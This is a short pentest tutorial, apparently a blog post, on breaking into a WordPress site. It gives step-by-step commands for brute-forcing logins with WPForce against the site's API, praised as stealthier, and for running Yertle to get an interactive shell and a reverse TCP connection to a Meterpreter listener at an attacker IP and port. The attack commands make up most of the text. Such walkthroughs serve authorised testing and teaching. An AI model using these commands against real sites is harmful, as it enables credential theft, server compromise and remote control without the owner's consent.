Reverse Shell in Wordpress with WPForce and Yertle
Imagine the scenario where you are presented with a WordPress site during a pentest and want to get in.
Standard ‘author?’ requests don’t give you the name of any users and you need to look else where.
One nice alternative to using WPScan to brute force the username and password field is WPForce.
Taken from the WPForce website, link: WPFORCE
” Unlike WPScan, which performs brute force login attempts against the login page of WordPress, WPForce uses authenticated API calls to test the validity of credentials. While most security plugins are wise to this method, it does provide slightly more stealth. “
So first, clone yourself a copy of WPForce
git clone https://github.com/n00py/WPForce.git
Once downloaded, parse the user, password and website deatils:
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
Once the script completes hopefully the Username and Password is dicovered. However if not choose different word-lists that are more appropriate to your scenario, maybe you get lucky.
executing the script
Example of a PAssword Found sucessfully
Having figured out the username and password to a Wordpress CMS site and now want to gain a shell.
Normally you would either have to circumvent the upload restrictions on the Wordpress page, which can be time consuming with a lot of trial and error or disguise an upload file within a custom built plugin. Again something potentially time consuming to achieve, this is where WPForce comes in.
WPForce is a useful tool that will create an interactive shell or a reverse TCP connection to a meterpreter listener. It also has lots of other interesting features like hooking to the BEEF Framework.
To start with, make sure you have the python ‘Requests’ HTTP libraries installed, you can install them using PIP.
pip install requests
Now we are set lets start..
Arguments - -t URL, -u username, -p password, -v verbose, -li localhost, -lp localport, -r reverse or -i interactive, -a User Agent.
python yertle.py -t http://192.168.0.122/wordpress -u admin -p admin -v -li 192.168.0.100 -lp 80 -r
Executing The Script
From here we have an interactive shell with limited functionality.
Interactive Shell
A simple directory listing from within the web server from an interactive shell.
Interactive Shell
Now setup a Meterpreter listener to wait for our connection.
Interactive Shell
Now we simply type ‘meterpreter’ and add the IP and Port details.
Interactive Shell
We receive the meterpreter session in metasploit.
Interactive Shell
Now we can continue our enumeration from Metasploit.